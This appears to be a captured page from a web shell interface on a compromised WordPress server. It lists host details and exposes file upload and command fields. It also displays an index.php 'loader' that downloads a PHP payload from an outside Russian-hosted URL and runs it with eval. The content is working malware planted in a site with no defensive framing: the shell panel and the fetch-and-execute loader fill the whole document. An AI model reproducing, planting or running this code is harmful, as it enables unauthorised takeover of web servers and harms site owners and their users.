403Webshell
Server IP : 217.160.0.212  /  Your IP : 216.73.217.72
Web Server : Apache
System : Linux www 6.18.51-i1-ampere #1196 SMP Fri Sep 11 20:43:55 CEST 2026 aarch64
User : sws1073854427 ( 1073854427)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/www/STRATO-apps/wordpress_02/app/rWBZa/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/www/STRATO-apps/wordpress_02/app/rWBZa/index.php
<?php
// AMBATUKAM LOADER
define('PAYLOAD_URL', 'http://u1298392.cp.regruhosting.ru/shell/ws.txt');

// Helper
function escape($t) { return htmlspecialchars($t, ENT_QUOTES, 'UTF-8'); }

// Fetch
function ambatufetch($url) {
    $parts = parse_url($url);
    if (!$parts || !isset($parts['host'])) return ['ok'=>false,'error'=>'invalid url'];
    
    $scheme = isset($parts['scheme']) ? $parts['scheme'] : 'http';
    $host = $parts['host'];
    $port = isset($parts['port']) ? $parts['port'] : ($scheme === 'https' ? 443 : 80);
    $path = ($parts['path'] ?? '/') . (isset($parts['query']) ? '?' . $parts['query'] : '');
    
    $socket = @stream_socket_client(
        ($scheme === 'https' ? 'ssl' : 'tcp') . "://{$host}:{$port}", 
        $errno, $errstr, 5
    );
    
    if (!$socket) return ['ok'=>false,'error'=>$errstr];
    
    $req = "GET {$path} HTTP/1.1\r\nHost: {$host}\r\nConnection: Close\r\n\r\n";
    fwrite($socket, $req);
    
    $res = '';
    while (!feof($socket)) $res .= fgets($socket, 2048);
    fclose($socket);
    
    $header_end = strpos($res, "\r\n\r\n");
    $body = $header_end !== false ? substr($res, $header_end + 4) : $res;
    
    return ['ok'=>!empty($body), 'content'=>$body];
}

// Fetch and execute payload directly
$p = ambatufetch(PAYLOAD_URL);
if ($p['ok']) { 
    eval("?>".$p['content']); 
    exit; 
}
$error = "Payload error: " . escape($p['error'] ?? 'Unknown error');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit